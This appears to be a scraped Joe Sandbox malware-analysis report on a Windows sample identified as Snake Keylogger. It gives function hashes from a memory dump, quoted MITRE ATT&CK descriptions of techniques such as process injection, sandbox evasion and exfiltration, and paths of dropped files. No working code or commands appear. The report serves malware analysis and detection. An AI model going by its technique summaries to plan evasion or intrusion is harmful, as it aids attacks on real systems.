Opcode ID: a35a98b137515d5ac2e9f88946b641a09644535daa7f7649ed8d431c4fd51e6c
Instruction ID: b61be6ed5d2824ebc127fba44586f0abd22b24acca91aca604b1a504c0968ba6
Opcode Fuzzy Hash: a35a98b137515d5ac2e9f88946b641a09644535daa7f7649ed8d431c4fd51e6c
Instruction Fuzzy Hash: FD12AA3A071B478FD6512F30DAFC96ABB62FB5F363344AD10E28F854459F78184A8A21

Function 02FEF71F Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f435a1450137e59e71b356db54672d593f32ae7cca40e07b1661ad13db945742
Instruction ID: 7835afe2aef92f16b486f64048d0ab7f2fe110ea0a8be222be5355052ce680e6
Opcode Fuzzy Hash: f435a1450137e59e71b356db54672d593f32ae7cca40e07b1661ad13db945742
Instruction Fuzzy Hash: 3F611374D00318DFDB14CFA5C998A9EBBB2FF88304F208529D909AB354DB395A86CF41

Function 02FED548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629290fd1297dbc1ad1f3dfd94bcf2718fea58ae74b14b28177b78e179e1b375
Instruction ID: ba0f7a7a3b34f29dd9a045718bb03cfd9e370c79d601c9e528d4dcedbfcf292e
Opcode Fuzzy Hash: 629290fd1297dbc1ad1f3dfd94bcf2718fea58ae74b14b28177b78e179e1b375
Instruction Fuzzy Hash: A7518174E01218DFDB58DFA9D9949DDBBF2BF89300F248169E819AB364DB30A901CF50

Function 02FE41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2bb4ed2cad9b6f51d7eafa17e63adbed1775fde2fb0f002066faf21723a738
Instruction ID: f69e8f174bd3497983f91f94a879887d175dfd962d91061ff7a1fff1b2c38b66
Opcode Fuzzy Hash: 7a2bb4ed2cad9b6f51d7eafa17e63adbed1775fde2fb0f002066faf21723a738
Instruction Fuzzy Hash: CE519575E01308CFCB19DFA9D58499DBBF2FF89304B209069E919AB364DB35A942CF50

Function 02FE5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfbc74a573562c1eb5d22424d71c531ff541f840f6ffec087de247b07ce6db7
Instruction ID: 7da40b8361745b84c24de4e40f59013872e6221257076ee2ef7180cb54ab74db
Opcode Fuzzy Hash: 5bfbc74a573562c1eb5d22424d71c531ff541f840f6ffec087de247b07ce6db7
Instruction Fuzzy Hash: 76315E716002199FCF169FA4DC54AAE7BA3EF88354F508024FA168B254CB79DD62DF90

Function 02FE28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d23742e8b6a9a2c03e02e729e1188f686c90061d04089daf04969382c03c05
Instruction ID: 64921c1581823e7ead4f7344de578ddc6a400c8d60d120fc7702b3ac58a395e5
Opcode Fuzzy Hash: e2d23742e8b6a9a2c03e02e729e1188f686c90061d04089daf04969382c03c05
Instruction Fuzzy Hash: 69219275E001059FCF25DF24C450AAE37A9EB9D2A4B10C019D94A9B240EB34EA43CBD2

Function 02FE6300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78348fcd12eceea757b0f93d1a0d4d55ec0edbf8cf49b3a88ae5461130513913
Instruction ID: 68f0a0e04b2565e8719e93170149dc74bb20a51cc54c411d9e13f2db94ca88d8
Opcode Fuzzy Hash: 78348fcd12eceea757b0f93d1a0d4d55ec0edbf8cf49b3a88ae5461130513913
Instruction Fuzzy Hash: 682108317006158FCB1A9B29C85492EB7A7EFD57947144468DA1BCB354CF34DC02CB80

Function 02FEAEF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfdb10b704ef533e0494c1d1ff9f1c03d352e877060a7b36db2d6020a1f8bbfa
Instruction ID: a94cbbf03697597b9884997070525e486c0498bbafb57ba105f97c1213b34cab
Opcode Fuzzy Hash: cfdb10b704ef533e0494c1d1ff9f1c03d352e877060a7b36db2d6020a1f8bbfa
Instruction Fuzzy Hash: FF117F72B10604ABCF108F54CC45FDDBBB6BB8C750F148025EA16A7290DB75AC11CB90

Function 02FEF640 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f755a507c216c9d54a553fa7d121ef0e8865ed4b253bddc5688a401c28bd4c
Instruction ID: bd60b659fe8cd04f518df0f60f3ee26395b8d16474dfcc1da0554b58dd65eacd
Opcode Fuzzy Hash: 89f755a507c216c9d54a553fa7d121ef0e8865ed4b253bddc5688a401c28bd4c
Instruction Fuzzy Hash: 6C21CDB0D002099FDB0ADFACCA9469EBFF2FB41300F1096A9C1549B3A5EB345A05CF80

Function 02FEF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40924439ee36885e932f09d9aa3ee708de27ed3b40cbf9c66f7fe880ce08b270
Instruction ID: 6f874b7a480c96206cc17a9617b721483557e27c679fded71df0bb3c63971b1e
Opcode Fuzzy Hash: 40924439ee36885e932f09d9aa3ee708de27ed3b40cbf9c66f7fe880ce08b270
Instruction Fuzzy Hash: A41129B0D002099FCB45EFA9DA9469EBBF2FB44300F1095A9C1199B265EB745A458F81

Function 02FE27F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f4553ec037456b37d0640bb1794030895a1c3c3460f943e9e9beaa0ae654e1
Instruction ID: 37c4aa1a127910bcdef0a02f470462e781bb810f8daf585eb04794fef71877ed
Opcode Fuzzy Hash: 79f4553ec037456b37d0640bb1794030895a1c3c3460f943e9e9beaa0ae654e1
Instruction Fuzzy Hash: 5B21C274D1060A8FCB05EFA9D944AEEBBF5FB09300F10452AD915B3210EB345A95CF91

Function 02FE5E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c95930fca1452a60e8bab561b2630736d8845e54fbdbb494280c2c7fb3b18d1
Instruction ID: b3357b01010e8bbfd57a6dbf66163acd4790b6743a5df2deb5d5d9ceb0c0c9bf
Opcode Fuzzy Hash: 9c95930fca1452a60e8bab561b2630736d8845e54fbdbb494280c2c7fb3b18d1
Instruction Fuzzy Hash: 77012832B001146BCF029EA8DC50BAF3BABDBC8790F148025F706C7240CE759D129B90

Function 02FEE8E8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5eaa85778535afd1cfeaa4bbf9c76ef619861526ed4e5bb5f665d44c8ff5134
Instruction ID: 14018f8961c70613e10df7553b31a10e4d058cf535a70729ae5002ebc76ae1c1
Opcode Fuzzy Hash: d5eaa85778535afd1cfeaa4bbf9c76ef619861526ed4e5bb5f665d44c8ff5134
Instruction Fuzzy Hash: 62011B74D0020A9FDF05CFA8D5596EEBBB1FB48310F104429DA14A3350D7345A16CF81

Function 02FE28A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0663c93052b8ccd77deb604572a38beed7b8e0985c403504c34888f8303e70d8
Instruction ID: 927e3f22e51b350ddc25147ee9d0365f685b1c68b03477056b8b38537dd29c52
Opcode Fuzzy Hash: 0663c93052b8ccd77deb604572a38beed7b8e0985c403504c34888f8303e70d8
Instruction Fuzzy Hash: 33E04F32D2026A56CB01EBA1EC456DEBB38EF96614F944962D56437400EB307669C6A2

Function 02FE28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 83759f0ec8055dcd7620f095b159c5f1eacd090e2d93acd3ccde7898c74582f8
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02FED6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8871704984041cd98f960fde8daea62449e040fcdaf5af986962ffcca6f7e317
Instruction ID: 40f86f28750b92b4e8baa1440ae78c13b3a0afcd3a4a7fa174a0293fc2665709
Opcode Fuzzy Hash: 8871704984041cd98f960fde8daea62449e040fcdaf5af986962ffcca6f7e317
Instruction Fuzzy Hash: 34D0E235E1040CCBCF20DFA9E8848DCBB71EB48321B10502ADA25A3252DA345851CF00

Function 02FEAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c79a85329ccecb92d0d69a7502a6f67cacae7535fd9a52b9aa10a08a75e5aba
Instruction ID: bc6dc5d8b8cda3d995daf7e9614844fac8001521ae3f8ffedefbac19e83ba4e8
Opcode Fuzzy Hash: 1c79a85329ccecb92d0d69a7502a6f67cacae7535fd9a52b9aa10a08a75e5aba
Instruction Fuzzy Hash: 51D0673AB40058DFCB149F99EC40CDDF7B6FB98221B148116EA15A3261CA319925DB54

Function 02FE6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6664e077aa4883b5b54a352899f01be73c0ecdaabf967ad29823141a3e5d94be
Instruction ID: e0cbc8dc061267ad3d0ffc34afcf3e513432071232db6d3d9ae0dc3d2c2e820f
Opcode Fuzzy Hash: 6664e077aa4883b5b54a352899f01be73c0ecdaabf967ad29823141a3e5d94be
Instruction Fuzzy Hash: 92C012304843084EC645E769DD59955B76FA6802007509620D2050A66EDF7859894F90

Non-executed Functions

Function 02FE7118 Relevance: 5.3, Strings: 4, Instructions: 344COMMON

Download Yara Rule

Strings

,bq, xrefs: 02FE7298
,bq, xrefs: 02FE728A
(o^q, xrefs: 02FE7212
(o^q, xrefs: 02FE7220

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 9dbbcb6dcc9baef722816623b16b15c3a71e1621374c1b2383894706e93462d7
Instruction ID: 8c54ee3c67c17b3c98a21b7e6e5c096b5e1147eaf3fa86a0c11460eed40652f7
Opcode Fuzzy Hash: 9dbbcb6dcc9baef722816623b16b15c3a71e1621374c1b2383894706e93462d7
Instruction Fuzzy Hash: 03E12A31E00219DFDF16DFA9C984AADFBB2BF88384F158065E906AB265D730E841CB50

Function 02FEF2C0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e403a0d23612977a7063f3b076653bc7d0ad181f9f1c2395df7d7ab7a68df95c
Instruction ID: 6731535f4976eb998c45d318c029c4caf6cabdedffa97981018368f3733d9fcd
Opcode Fuzzy Hash: e403a0d23612977a7063f3b076653bc7d0ad181f9f1c2395df7d7ab7a68df95c
Instruction Fuzzy Hash: B5514771D01208CBDF16EFA9C9887DDBBB2BF89340F14D229D606AB694DB359881CF54

Function 02FEF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd50f3f0c7187051c27fe60d5074f239be756487c60ad05e1afb9402c1c5e6c
Instruction ID: 9098b001d645838e6cfec8f176d1776fea154d85c854069cb2a9b79036c65cf6
Opcode Fuzzy Hash: dbd50f3f0c7187051c27fe60d5074f239be756487c60ad05e1afb9402c1c5e6c
Instruction Fuzzy Hash: E5511570E01218CFDF16DFA8D5887ADBBB2BF49354F209219D216AB684D7359881CF50

Function 02FE6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02FE6936
\;^q, xrefs: 02FE692C
\;^q, xrefs: 02FE695E
\;^q, xrefs: 02FE6952

Memory Dump Source

Source File: 00000007.00000002.3032182179.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fe0000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
Instruction ID: eac3cc1a84da2dbb22483cac21a205656304a305653561dd37229b2fbb5ff543
Opcode Fuzzy Hash: 2af3ef0980c6da25ddb741617409720a33641dd2780bf16f20abfd4ecde549b2
Instruction Fuzzy Hash: 9D019E32B401088F8F298E2CC564A2D33EEABB8AA07154469E647CF3B4DA21DC41C750

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4Vx2rUlb0f.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cypj1un.3ss.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhsmv0st.b0g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjvycz4c.v0t.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yaojdow5.ud0.ps1

C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe:Zone.Identifier

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\Cordts.for

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\Isoserine.neg

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\harpedes.ham

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206

C:\Users\user\AppData\Local\neoimpressionism\Dandyism.Par

Windows Analysis Report
4Vx2rUlb0f.exe

Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00406072 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405841 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C3C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

